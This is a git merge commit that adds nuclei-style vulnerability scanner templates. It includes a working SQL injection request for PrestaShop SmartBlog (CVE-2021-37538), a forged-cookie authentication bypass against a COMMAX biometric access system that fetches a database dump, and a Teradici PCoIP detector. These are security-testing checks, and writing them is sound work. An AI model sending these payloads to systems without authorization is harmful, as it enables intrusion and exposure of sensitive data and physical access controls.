Merge branch 'projectdiscovery:master' into master

2021-08-24 18:09:24 +02:00 · 2021-08-24 18:09:24 +02:00 · 6ca52d89ab
parent 7d6a6c137a 9cd48d0482
commit 6ca52d89ab
4 changed files with 87 additions and 2 deletions
--- a/cves/2021/CVE-2021-37538.yaml
+++ b/cves/2021/CVE-2021-37538.yaml
@ -0,0 +1,27 @@
+id: CVE-2021-37538
+
+info:
+  name: PrestaShop SmartBlog SQL Injection
+  author: whoever
+  severity: high
+  description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality.
+  tags: cve,cve2021,prestashop,smartblog,sqli
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538
+    - https://blog.sorcery.ie/posts/smartblog_sqli/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "c5fe25896e49ddfe996db7508cf00534"
+        part: body
--- a/technologies/teradici-pcoip.yaml
+++ b/technologies/teradici-pcoip.yaml
@ -0,0 +1,23 @@
+id: teradici-pcoip
+
+info:
+  name: Teradici PCoIP Detection
+  author: pdteam
+  severity: info
+  tags: tech,pcoip
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/info/"
+
+    matchers:
+      - type: word
+        words:
+          - "PCoIP Connection Manager"
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - 'PCoIP Connection Manager\/([0-9.]+)\.'
--- a/vulnerabilities/other/commax-biometric-auth-bypass.yaml
+++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml
@ -0,0 +1,35 @@
+id: commax-biometric-auth-bypass
+
+info:
+  name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
+  author: gy741
+  severity: critical
+  description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
+  reference:
+    - https://www.exploit-db.com/exploits/50206
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
+  tags: commax,auth-bypass
+
+requests:
+  - raw:
+      - |
+        GET /db_dump.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Referer: {{BaseURL}}/user_add.php
+        Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<title>::: COMMAX :::</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
--- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
+++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
@ -1,7 +1,7 @@
 id: wp-woocommerce-pdf-invoice-listing

 info:
-  name: WordPress Upload Fuzzing
+  name: Woocommerce PDF Invoice Exposure
  author: mohammedsaneem,sec_hawk
  severity: medium
  description: Allows attacker to view sensitive information such as company invoices
@ -28,4 +28,4 @@ requests:

      - type: status
        status:
-          - 200
+          - 200